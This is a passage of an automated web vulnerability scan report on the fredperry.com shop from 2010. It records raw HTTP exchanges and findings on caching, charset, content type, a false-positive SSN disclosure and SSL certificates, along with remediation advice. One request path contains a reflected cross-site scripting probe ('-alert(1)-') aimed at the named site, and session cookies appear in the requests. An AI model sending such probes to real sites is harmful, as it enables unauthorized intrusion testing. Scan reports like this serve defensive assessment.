<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Tennis ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Trouser ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Woven S ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Custome ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
The following social security number was disclosed in the response:
123-45-6789
Request
GET /customer8c3dc%22-alert(1)-%2276794ee1910/account/ HTTP/1.1 Host: www.fredperry.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.194CKOLO; __utma=119066206.1815755339.1289339096.1289339096.1289349290.2; __utmc=119066206; __utmb=119066206.4.10.1289349290
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 18:36:18 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=e1t1bajii7coiqcugmfaqqj404; expires=Tue, 09-Nov-2010 19:36:18 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Keep-Alive: timeout=3, max=500 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 29379
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
/* Prototype JavaScript framework, version 1.6.0.3 * (c) 2005-2008 Sam Stephenson * * Prototype is freely distributable under the terms of an MIT-style license. * For details, see the Prototype we ...[SNIP]... something_1, block5, id-4', function (v) { return Validation.get('IsEmpty').test(v) || /^[A-Z][A-Z0-9_\/-]*$/i.test(v) }], ['validate-ssn', 'Please enter a valid social security number. For example 123-45-6789.', function(v) { return Validation.get('IsEmpty').test(v) || /^\d{3}-?\d{2}-?\d{4}$/.test(v); }], ['validate-zip', 'Please enter a valid zip code. For example 90602 or 90602-1234.', function(v) {
Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.
Issue remediation
The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:
Cache-control: no-store
Pragma: no-cache
Request
GET /skin/frontend/default/default/favicon.ico HTTP/1.1 Host: www.fredperry.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.194CKOLO; __utma=119066206.1815755339.1289339096.1289339096.1289349290.2; __utmc=119066206; __utmb=119066206.4.10.1289349290
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.
In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.
Request
GET /js/index.php HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 200 OK Date: Tue, 09 Nov 2010 16:13:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Content-Length: 52 Connection: close Content-Type: text/html
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
The server presented a valid, trusted SSL certificate. This issue is purely informational.
The server presented the following certificates:
Server certificate
Issued to:
www.fredperry.com
Issued by:
Thawte Server CA
Valid from:
Sun Dec 13 18:00:00 CST 2009
Valid to:
Wed Mar 14 18:59:59 CDT 2012
Certificate chain #1
Issued to:
Thawte Server CA
Issued by:
Thawte Server CA
Valid from:
Wed Jul 31 19:00:00 CDT 1996
Valid to:
Fri Jan 01 17:59:59 CST 2021
Issue background
SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.
It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.Report generated by Hoyt LLC Research
at Tue Nov 09 18:42:29 CST 2010.